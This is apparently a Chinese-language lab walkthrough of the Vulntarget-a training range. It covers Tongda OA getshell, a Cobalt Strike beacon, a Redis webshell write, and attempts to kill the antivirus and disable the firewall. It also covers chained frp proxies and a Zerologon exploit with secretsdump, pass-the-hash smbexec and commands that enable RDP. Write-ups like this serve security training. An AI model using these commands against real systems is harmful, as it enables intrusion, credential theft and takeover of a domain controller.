Vulntarget-a

admin
admin
admin
138635
文章
114
评论
2024年2月21日22:37:48评论35 views字数 3628阅读12分5秒阅读模式

前言:

本文来自团队师傅:"一只虾虾虾虾虾"的投稿,在此致谢。本文内容关于Vulntarget-a靶场的攻击全过程,非常适用于刚学习内网渗透的朋友。

1. 外网打点

访问靶机地址:

http://192.168.0.104/qcuicmnflz.php

Vulntarget-a

1.1. 通达OA

Vulntarget-a

1.2. Getshell:

Vulntarget-a

2. 边界突破

2.1. 上线CobaltStrike

Vulntarget-a
双网卡机器:
Vulntarget-a

2.2. 利用CobaltStrike搭建socks5代理

Vulntarget-a
socks 27424 SOCKS5 enableNoAuth "" "" disableLogging
Vulntarget-a

2.3. 内网信息收集

获取受控机器信息:
systeminfo
Vulntarget-a
3389端口未开放:
netstat -an | find "3389"
Vulntarget-a
利用插件开启rdp服务,获取win7账号密码,进行远程连接:
Vulntarget-a
Vulntarget-a
使用fscan梭哈,未发现其他存活主机:
Vulntarget-a
使用CobaltStrike插件多协议探测,存在10.0.20.99的机器:
Vulntarget-a

3. 内网其他主机

针对10.0.20.99常见端口扫描,开启80及6379端口:
Vulntarget-a

3.1. web渗透

80端口开放:
Vulntarget-a
扫描目录存在phpinfo.php文件,从中获取到网站的绝对路径:
Vulntarget-a

3.2. redis未授权

连接redis数据库:
Vulntarget-a
由于已经知道网站的绝对路径,可直接通过命令行写入一句话木马:
Vulntarget-a
访问:
Vulntarget-a

3.3. Getshell

蚁剑配置socks5代理:
Vulntarget-a
Vulntarget-a
该系统也为system权限:
Vulntarget-a

3.4. 上线CobaltStrike

通过入口机建立监听器:
Vulntarget-a
输入名称进行保存:
Vulntarget-a
选择payloads生成木马文件:
Vulntarget-a
选择监听器:
Vulntarget-a
上传到服务器:
Vulntarget-a
多次执行未果,查看tasklist /SVC存在MsMpEng.exe进程,关闭杀软:
taskkill /F /IM MsMpEng.exe (失败)
Vulntarget-a
参考文章地址:
https://xz.aliyun.com/t/12280#toc-8
Vulntarget-a
另外提到的方式是使用powershell命令关闭防火墙,使用cmd执行powershell命令方式:
powershell -Command "ls"
Vulntarget-a
netsh advfirewall set allprofiles state off
Vulntarget-a
shell netsh advfirewall show allprofiles
Vulntarget-a
这里卡了很久关掉Windows杀软,发现MsMpEng.exe依旧存在,后面发现运行木马可以直接上线:
Vulntarget-a
密码获取:
Vulntarget-a
Vulntarget-a
配置代理远程连接:
Vulntarget-a

4. 横向其他主机

4.1. 信息收集

arp -a
Vulntarget-a
ipconfig
Vulntarget-a
fscan
Vulntarget-a
存在域:
VULNTARGET
Vulntarget-a

4.2. 寻找域控主机

nslookup -type=SRV _ldap._tcp.corp
Vulntarget-a
netdom query pdc
Vulntarget-a
ipconfig /all
Vulntarget-a
net group "domain controllers" /domain
Vulntarget-a
net time /domain
Vulntarget-a
查看其他域成员:
net group /domain
Vulntarget-a域内主机只有win2016:
net group "domain computers" /domain
Vulntarget-a

4.3. 二级代理

使用Win7代理无法访问域控主机:
Vulntarget-a
所以需要在域成员机(WIN2016)搭建代理访问域控机器,使用frp搭建多级代理,参考文章:
http://myblog.ac.cn/archives/2023-01-01-15-38-00
此前已经搭建过WIN7和攻击机通信的代理,配置文件如下:
[common]bind_addr =0.0.0.0bind_port =9000
[common]server_addr = 43.139.74.167server_port = 9000[socks_proxy]type = tcpremote_port =6789plugin = socks5#端口转发[portforward]type = tcplocal_ip = 127.0.0.1remote_port = 6000local_port = 6000
可正常访问WIN2016的网站:
Vulntarget-a
接下来使用frp将WIN2016的流量代理到WIN7机器上面:
[common]bind_port = 9001
[common]server_addr = 10.0.20.98server_port = 9001[sock5]type = tcpplugin = socks5remote_port = 6000
配图,vps(frps配置):
Vulntarget-a
win7(frpc配置):
Vulntarget-a
win7(frps配置):
Vulntarget-a
win2016(frpc配置):
Vulntarget-a
使用proxychains4端口测试:
Vulntarget-a

4.4. 获取域控主机权限

使用域内漏洞CVE-2020-1472 Poc测试是否存在该漏洞。
  • 漏洞描述
2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来。该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。攻击者在通过NetLogon(MS-NRPC)协议与AD域控建立安全通道时,可利用该漏洞将AD域控的计算机账号密码置为空,从而控制域控服务器。
该漏洞影响服务器范围:
  • Windows Server 2008 R2 for x64 -based Systems Service Pack 1
  • Windows Server 2008 R2 for x64 -based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Server 2016
  • Windows Server 2016 (Server Core installation)
  • Windows Server 2019
  • Windows Server 2019 (Server Core installation)
  • Windows Server, version 1903 (Server Core installation)
  • Windows Server, version 1909 (Server Core installation)
  • Windows Server, version 2004 (Server Core installation)
POC:https://github.com/SecuraBV/CVE-2020-1472
EXP:https://github.com/dirkjanm/CVE-2020-1472
这里就直接使用EXP,别问为什么,问就是看别人通关WP了。
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
Vulntarget-a
将域控账号置空,以下为漏洞利用原理及为什么要将域控账号置空:
默认状况下,加域计算机每三十天就会更改一次计算机密码,这个密码会分别被存在计算机本地和AD里面。同时,计算机自己会保存两份密码在本地:当前的密码和以前的密码。当计算机尝试和DC创建secure channel的时候,它会先使用最新的密码,若是这个密码无效,那么它会尝试使用以前的那个密码,若是这个密码也不可以和AD域里面保存的密码匹配,那么计算机和DC之间的secure channel就会被破坏,咱们将不能经过域帐号登陆到这台电脑上。
原文链接:
https://blog.csdn.net/liu_jia_liang/article/details/123226141
proxychains4 python3 secretsdump.py vulntarget.com/win2019$@10.0.10.110 -no-pass
Vulntarget-a
proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
Vulntarget-a
开启远程端口:
reg add "HKLMSystemCurrentControlSetControlTerminalServerWinStationsRDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /fwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
Vulntarget-a
利用smbexec获取的administrator hash值进行远程登录:

administrator/Admin@666

Vulntarget-a

原文始发于微信公众号(前进四安全团队):Vulntarget-a

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月21日22:37:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulntarget-ahttps://cn-sec.com/archives/2508654.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息